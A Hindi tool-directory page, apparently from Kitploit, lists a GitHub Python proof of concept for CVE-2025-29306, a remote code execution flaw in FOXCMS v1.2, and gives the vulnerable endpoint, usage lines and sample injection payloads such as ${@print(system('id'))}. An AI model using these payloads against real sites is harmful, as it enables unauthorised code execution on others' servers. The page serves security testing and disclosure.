Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FOXCMS-CVE-2025-29306-POC — CVE-2025-29306 के लिए पायथन PoC, FOXCMS v1.2 में एक पैरामीटर इंजेक्शन RCE। अधिकृत सुरक्षा परीक्षण के लिए /images/index.html पर id पैरामीटर के माध्यम से PHP कोड इंजेक्ट करता है। | Kitploit
उपकरण/GitHubGitHub/inok009/foxcms-cve-2025-29306-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubinok009/foxcms-cve-2025-29306-poc

FOXCMS-CVE-2025-29306-POC

CVE-2025-29306 के लिए पायथन PoC, FOXCMS v1.2 में एक पैरामीटर इंजेक्शन RCE। अधिकृत सुरक्षा परीक्षण के लिए /images/index.html पर id पैरामीटर के माध्यम से PHP कोड इंजेक्ट करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं
साझा करें

FOXCMS पैरामीटर इंजेक्शन RCE – CVE-2025-29306

इस रिपॉजिटरी में FOXCMS v1.2, एक चीनी ओपन-सोर्स कंटेंट मैनेजमेंट सिस्टम, को प्रभावित करने वाली रिमोट कोड एक्जीक्यूशन (RCE) भेद्यता का Python-आधारित PoC शामिल है।

CVE-ID: CVE-2025-29306
प्रभावित करता है: FOXCMS v1.2
प्रकार: सेवा पैरामीटर इंजेक्शन → कोड निष्पादन


भेद्यता सारांश

FOXCMS /images/index.html एंडपॉइंट पर id पैरामीटर में असुरक्षित पैरामीटर पार्सिंग तंत्र से ग्रस्त है। यह ${@print()} अभिव्यक्तियों का उपयोग करके पेलोड इंजेक्शन की अनुमति देता है, जिससे PHP कोड निष्पादन होता है।


PoC उपयोग

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी
root@kitploit:~
pip install requests

# Usage 
python foxcms_poc.py http://target.com/images/index.html?id=

# The script uses payloads like:

${@print(phpinfo())}
${@print(system('id'))}

# 🔐 Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.

लेखक

Inok009

टूल डाउनलोड करें